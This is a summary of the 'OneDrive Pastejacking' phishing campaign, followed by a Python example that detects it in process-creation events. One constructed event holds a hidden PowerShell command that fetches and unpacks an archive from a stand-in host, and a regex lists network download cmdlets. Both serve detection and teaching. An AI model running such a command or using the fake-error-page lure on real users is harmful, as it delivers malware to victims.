Who:
Target: Microsoft OneDrive users.
Attackers: Cybercriminals leveraging phishing techniques.
Researchers: Trellix security researcher Rafael Pena and others.
What:
Phishing Campaign: Dubbed "OneDrive Pastejacking," the campaign tricks users into running a malicious PowerShell script.
Attack Method: Users receive an email with an HTML file mimicking a OneDrive error page, prompting them to execute a PowerShell command to fix a supposed DNS issue. This command downloads and executes malicious files.
Impact:
Affected Regions: The campaign targets users in the U.S., South Korea, Germany, India, Ireland, Italy, Norway, and the U.K.
Malicious Actions: The PowerShell script compromises systems by creating a folder, downloading an archive, and executing its contents using AutoIt3.exe.
Security Implications: Phishing campaigns increasingly rely on social engineering to get past technical controls, abusing trusted platforms such as Microsoft Office Forms and Discord's CDN infrastructure to host or deliver their content.
Detection Evasion: Attackers use tactics like disguising HTML payloads as MPEG files in ZIP archives to evade Secure Email Gateways (SEGs).
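The behaviour described above (a user pasting a PowerShell command that downloads an archive, then AutoIt3.exe running its contents) leaves a recognisable process-creation trail. The following detection logic is an added example, not code from the article or from Trellix; it runs over constructed Sysmon-style process events, and the field names, paths and URL are assumptions made for the example.

```python
import re

# Constructed sample process-creation events in a Sysmon Event ID 1-like shape.
# Field names and values are assumptions for this example, not real telemetry.
SAMPLE_EVENTS = [
    {  # a command pasted into the Run dialog: explorer.exe spawns powershell.exe
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -w hidden -c \"Invoke-WebRequest https://host.invalid/s.zip "
                       "-OutFile $env:TEMP\\s.zip; Expand-Archive $env:TEMP\\s.zip\"",
    },
    {  # archive contents executed with AutoIt3.exe from a user-writable folder
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "Image": r"C:\Users\alice\AppData\Local\Temp\s\AutoIt3.exe",
        "CommandLine": r"C:\Users\alice\AppData\Local\Temp\s\AutoIt3.exe script.a3x",
    },
    {  # benign: a scheduled task running an admin script, no network download
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -File C:\Scripts\inventory.ps1",
    },
]

# Cmdlets and aliases commonly used to pull content from the network.
DOWNLOAD_CMDLETS = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|\bcurl\b|\bwget\b|start-bitstransfer",
    re.I)
# Locations an unprivileged user can write to and launch binaries from.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(AppData|Downloads|Desktop)\\|\\Temp\\|\\ProgramData\\", re.I)

def is_powershell(image):
    return image.lower().endswith(("powershell.exe", "pwsh.exe"))

def detect(events):
    """Return (rule_name, image) tuples for events matching the pastejacking pattern."""
    findings = []
    for ev in events:
        image, parent, cmd = ev["Image"], ev["ParentImage"], ev["CommandLine"]
        # Rule 1: PowerShell started from the interactive shell (explorer.exe is the
        # parent for Run-dialog pastes) and fetching content from the network.
        if is_powershell(image) and parent.lower().endswith("explorer.exe") \
                and DOWNLOAD_CMDLETS.search(cmd):
            findings.append(("interactive_powershell_download", image))
        # Rule 2: the AutoIt interpreter launched from a user-writable path.
        if image.lower().endswith("autoit3.exe") and USER_WRITABLE.search(image):
            findings.append(("autoit_from_user_writable_path", image))
    return findings
```

Rule 1 on its own will also fire on administrators who paste download one-liners; correlating it with Rule 2 within a short window, or with a PowerShell parent that is a browser-opened HTML file, lowers the false-positive rate.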
Key Takeaways:
Vigilance Needed: Users should be cautious of unexpected emails, especially those prompting actions involving PowerShell or DNS updates.
Use Official Channels: Verify any instructions or fixes through official support channels and websites.
Enhanced Security Measures: Organizations should reinforce email security protocols and educate users on identifying phishing attempts.